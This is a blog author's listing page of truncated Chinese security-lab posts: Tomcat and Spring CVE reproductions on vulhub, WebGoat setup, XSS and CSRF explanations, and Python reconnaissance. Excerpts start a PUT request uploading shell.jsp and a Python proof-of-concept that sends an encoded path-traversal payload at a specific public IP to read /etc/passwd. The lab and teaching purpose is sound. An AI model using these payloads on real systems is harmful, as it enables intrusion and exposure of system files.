- 博客(12)
- 收藏
- 关注
原创 Tomcat漏洞
1.Tomcat put方法任意文件上传漏洞(CVE-2017-12615)进入环境输入http://ip:8080抓包并改包:PUT /shell.jsp/ HTTP/1.1Host: your-ip:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeConten
2022-05-27 10:52:20
551
原创 Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)复现
1.通过"docker-compose build"和"docker-compose up -d"拉取环境刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker2.访问服务器ip:8080/users看环境是否成功3.注册时抓包,并修改成如下数据包:POST /users?page=&size=5 HTTP/1.1Host: localhost:8080Connection:
2022-05-25 19:09:37
487
原创 kali搭建vulhub靶场
1.kali更新aptsudo apt-get update2.安装https协议及CA证书sudo apt-get install -y apt-transport-https ca-certificates3.安装Dockersudo apt install docker.io4.查看docker是否安装成功docker -v5.安装pip3sudo apt-get install python3-pip6.安装docker-composepip3 install dock
2022-05-25 17:02:54
639
1
原创 kali搭建webgoat靶场
下载webgoat-server-8.0.0.M26.jar与webwolf-server-8.0.0.M26.jar,并保存至kali的文件documents处(不然无法打开)打开webgoat-server-8.0.0.M26.jar浏览器访问127.0.0.1:8080/WebGoat/login.html进行注册且登录成功!
2022-05-23 19:20:08
617
原创 xss--跨站脚本攻击
一、定义攻击者在网页中嵌入恶意脚本代码(javascript),当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者目的。二、原理本质:可控变量,显示输出变量。代码在对数据进行显示出现的安全问题。——js代码产生层面:前端。函数类:输出型函数。危害影响:受js代码影响。浏览器内核版本:受对方浏览器版本限制,可能带有过滤。三、危害(1)窃取管理员帐号或cookie。入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息
2022-05-14 17:41:46
2609
原创 CSRF--跨站请求伪造
1. 原理小黑想要修改大白在购物网站www.xx.com上填写的会员地址。先看下大白是如何修改自己的会员地址的:登录—修改会员信息,提交请求—修改成功。所以小黑想要修改大白的信息,他需要拥有:1.登录权限 2.修改个人信息的请求。但是大白又不会把自己xx网站的账号密码告诉小黑,那小黑怎么办?于是他自己跑到www.xx.com上注册了一个自己的账号,然后修改了一下自己的个人信息(比如:E-mail地址),他发现修改的请求是:http://www.xxx.com/edit.php?email=xia
2022-05-12 20:43:34
423
原创 python开发-批量Fofa&POC验证&SRC提取
Python开发-glassfish任意文件读取漏洞POC验证脚本import requestsurl=”http://217.27.153.138:4848/”payload_linux = "/theme/METAINF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
2022-05-12 20:02:34
873
原创 python信息收集
外网信息收集:1.ip查询import socketip=socket.gethostbyname(url)print(ip)2.whois查询from whois import whois #需要安装python-whois模块whois_data=whois(url)print(whois_data)3.cdn判断#方法1:缺点是结果无法读取操作import system,osns="nslookup "+urlcdn_data=os.system(ns)print(
2022-05-11 17:56:50
751
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人